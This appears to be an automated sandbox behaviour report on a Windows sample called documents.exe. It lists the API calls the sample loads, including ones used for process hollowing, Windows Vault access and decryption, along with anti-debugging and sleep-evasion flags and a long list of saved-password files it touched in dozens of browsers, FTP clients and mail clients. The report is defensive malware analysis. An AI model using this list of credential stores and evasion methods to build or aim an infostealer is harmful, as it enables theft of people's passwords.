- DynamicLoader: KERNEL32.dll/DeleteFileW
- DynamicLoader: MSCOREE.DLL/ND_RI4
- DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
- DynamicLoader: mscoreei.dll/ND_RI4
- DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
- DynamicLoader: mscoreei.dll/LoadLibraryShim
- DynamicLoader: culture.dll/ConvertLangIdToCultureName
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: KERNEL32.dll/FindAtom
- DynamicLoader: KERNEL32.dll/FindAtomW
- DynamicLoader: KERNEL32.dll/AddAtom
- DynamicLoader: KERNEL32.dll/AddAtomW
- DynamicLoader: MSCOREE.DLL/LoadLibraryShim
- DynamicLoader: gdiplus.dll/GdiplusStartup
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: USER32.dll/GetWindowInfo
- DynamicLoader: USER32.dll/GetAncestor
- DynamicLoader: USER32.dll/GetMonitorInfoA
- DynamicLoader: USER32.dll/EnumDisplayMonitors
- DynamicLoader: USER32.dll/EnumDisplayDevicesA
- DynamicLoader: GDI32.dll/ExtTextOutW
- DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
- DynamicLoader: gdiplus.dll/GdipLoadImageFromStream
- DynamicLoader: WindowsCodecs.dll/DllGetClassObject
- DynamicLoader: KERNEL32.dll/WerRegisterMemoryBlock
- DynamicLoader: gdiplus.dll/GdipImageForceValidation
- DynamicLoader: gdiplus.dll/GdipGetImageType
- DynamicLoader: gdiplus.dll/GdipGetImageRawFormat
- DynamicLoader: KERNEL32.dll/SwitchToThread
- DynamicLoader: gdiplus.dll/GdipGetImageWidth
- DynamicLoader: gdiplus.dll/GdipGetImageHeight
- DynamicLoader: gdiplus.dll/GdipGetImageEncodersSize
- DynamicLoader: KERNEL32.dll/LocalAlloc
- DynamicLoader: gdiplus.dll/GdipGetImageEncoders
- DynamicLoader: KERNEL32.dll/lstrlenW
- DynamicLoader: KERNEL32.dll/lstrlenWW
- DynamicLoader: KERNEL32.dll/RtlMoveMemory
- DynamicLoader: KERNEL32.dll/RtlMoveMemoryW
- DynamicLoader: KERNEL32.dll/LocalFree
- DynamicLoader: gdiplus.dll/GdipSaveImageToStream
- DynamicLoader: gdiplus.dll/GdipCreateBitmapFromStream
- DynamicLoader: gdiplus.dll/GdipBitmapLockBits
- DynamicLoader: gdiplus.dll/GdipBitmapUnlockBits
- DynamicLoader: gdiplus.dll/GdipDisposeImage
- DynamicLoader: CRYPTSP.dll/CryptEncrypt
- DynamicLoader: KERNEL32.dll/GlobalMemoryStatusEx
- DynamicLoader: shell32.dll/SHGetSpecialFolderPath
- DynamicLoader: shell32.dll/SHGetSpecialFolderPathW
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/CreateProcessW
- DynamicLoader: ntdll.dll/NtAlertResumeThread
- DynamicLoader: ntdll.dll/NtGetContextThread
- DynamicLoader: ntdll.dll/NtSetContextThread
- DynamicLoader: ntdll.dll/NtUnmapViewOfSection
- DynamicLoader: ntdll.dll/NtWriteVirtualMemory
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/CreateFile
- DynamicLoader: KERNEL32.dll/CreateFileW
- DynamicLoader: KERNEL32.dll/GetFileType
- DynamicLoader: ole32.dll/CoWaitForMultipleHandles
- DynamicLoader: KERNEL32.dll/DeleteAtom
- DynamicLoader: KERNEL32.dll/DeleteAtomW
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptGenRandom
- DynamicLoader: ole32.dll/NdrOleInitializeExtension
- DynamicLoader: ole32.dll/CoGetClassObject
- DynamicLoader: ole32.dll/CoGetMarshalSizeMax
- DynamicLoader: ole32.dll/CoMarshalInterface
- DynamicLoader: ole32.dll/CoUnmarshalInterface
- DynamicLoader: ole32.dll/StringFromIID
- DynamicLoader: ole32.dll/CoGetPSClsid
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: ole32.dll/CoReleaseMarshalData
- DynamicLoader: ole32.dll/DcomChannelSetHResult
- DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptCreateHash
- DynamicLoader: CRYPTSP.dll/CryptHashData
- DynamicLoader: CRYPTSP.dll/CryptGetHashParam
- DynamicLoader: CRYPTSP.dll/CryptDestroyHash
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: vaultcli.dll/VaultEnumerateItems
- DynamicLoader: vaultcli.dll/VaultEnumerateVaults
- DynamicLoader: vaultcli.dll/VaultFree
- DynamicLoader: vaultcli.dll/VaultGetItem
- DynamicLoader: vaultcli.dll/VaultOpenVault
- DynamicLoader: vaultcli.dll/VaultCloseVault
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: CRYPTSP.dll/CryptImportKey
- DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
- DynamicLoader: CRYPTSP.dll/CryptDecrypt
- DynamicLoader: CRYPTSP.dll/CryptDestroyKey
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
A process attempted to delay the analysis task.
Severity: Medium
Confidence: Very High
- Process: documents.exe tried to sleep 273 seconds, actually delayed analysis time by 0 seconds
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-08-31 05:29:55 | 2018-08-31 05:32:55 | 180 |
10 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\documents.exe.config C:\Users\Seven01\AppData\Local\Temp\documents.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\documents.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\documents.config C:\Users\Seven01\AppData\Local\Temp\documents.INI C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\uxtheme.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni.dll C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI C:\Users\Seven01\AppData\Local\Temp\documents.exe:Zone.Identifier C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources\QTFC.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources\QTFC.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources\QTFC.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources\QTFC.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Users\Seven01\AppData\Local\Temp\shell32.dll C:\ProgramData\Microsoft\Windows\Start Menu\ C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2688.7335343 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2688.7335343 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2688.7335500 C:\Program Files\NETGATE\Black Hawk C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE} C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalNichrome\Login Data C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalRockMelt\Login Data C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSpark\Login Data C:\Users\Seven01\AppData\LocalSpark\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalChromium\Login Data C:\Users\Seven01\AppData\LocalChromium\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTitan Browser\Login Data C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTorch\Login Data C:\Users\Seven01\AppData\LocalTorch\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalVivaldi\Login Data C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSuperbird\Login Data C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMustang Browser\Login Data C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalOrbitum\Login Data C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalIridium\Login Data C:\Users\Seven01\AppData\LocalIridium\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db C:\Users\Seven01\AppData\Roaming\Opera C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml C:\Users\Seven01\Documents\SuperPutty C:\Program Files (x86)\FTPShell\ftpshell.fsi C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites C:\Program Files (x86)\FTP Now\sites.xml C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions C:\Program Files (x86)\EasyFTP\data C:\Users\Seven01\AppData\Roaming\SftpNetDrive C:\Program Files (x86)\AbleFTP7\encPwd.jsd C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\encPwd.jsd C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\encPwd.jsd C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\encPwd.jsd C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\encPwd.jsd C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\encPwd.jsd C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\encPwd.jsd C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\encPwd.jsd C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\encPwd.jsd C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\encPwd.jsd C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\encPwd.jsd C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\encPwd.jsd C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\encPwd.jsd C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\encPwd.jsd C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\encPwd.jsd C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\encPwd.jsd C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize7\encPwd.jsd C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize8\encPwd.jsd C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize9\encPwd.jsd C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize10\encPwd.jsd C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize11\encPwd.jsd C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize12\encPwd.jsd C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize13\encPwd.jsd C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize14\encPwd.jsd C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd C:\Users\Seven01\AppData\Roaming\Cyberduck C:\Users\Seven01\AppData\Roaming\iterate_GmbH C:\Users\Seven01\.config\fullsync\profiles.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg C:\Program Files (x86)\FileZilla\Filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Program Files (x86)\Staff-FTP\sites.ini C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat C:\Program Files (x86)\Fastream NETFile\My FTP Links C:\Program Files (x86)\GoFTP\settings\Connections.txt C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat C:\Program Files (x86)\DeluxeFTP\sites.xml C:\Windows\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini C:\Users\Seven01\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini C:\Program Files (x86)\FTPGetter\Profile\servers.xml C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml C:\Program Files (x86)\WS_FTP\WS_FTP.INI C:\Windows\WS_FTP.INI C:\Users\Seven01\AppData\Roaming\Ipswitch C:\Users\Seven01\site.xml C:\Users\Seven01\AppData\Local\PokerStars* C:\Users\Seven01\AppData\Local\ExpanDrive C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt C:\Users\Seven01\AppData\Roaming\FlashFXP C:\ProgramData\FlashFXP C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat C:\ProgramData\NetDrive2\drives.dat C:\Users\Seven01\AppData\Roaming\SmartFTP C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db C:\Users\Seven01\Documents\*.tlp C:\Users\Seven01\Documents\*.bscp C:\Users\Seven01\Documents\*.vnc C:\Users\Seven01\Desktop\*.vnc C:\Users\Seven01\Documents\mSecure C:\ProgramData\Syncovery C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP C:\Program Files (x86)\Foxmail\mail C:\Foxmail* 